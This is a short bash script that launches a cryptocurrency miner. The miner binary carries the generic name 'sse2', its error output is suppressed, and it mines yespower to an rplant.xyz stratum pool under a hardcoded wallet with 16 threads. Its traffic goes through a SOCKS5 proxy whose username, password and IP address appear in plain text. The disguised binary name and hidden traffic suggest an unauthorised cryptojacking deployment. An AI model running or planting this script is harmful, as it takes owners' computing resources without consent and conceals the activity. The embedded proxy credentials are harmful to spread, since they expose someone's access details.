#!/bin/bash
chmod +x sse2 >/dev/null 2>&1


./sse2 -a yespower  -o stratum+tcps://stratum-na.rplant.xyz:17017 -u web1qxnm9q7txetqj6uzxat4xkas6rxr93q5fc7xjm4.SMLT -t 16 -x socks5://pekoktenan88:pekoktenan88@45.140.13.119:9132
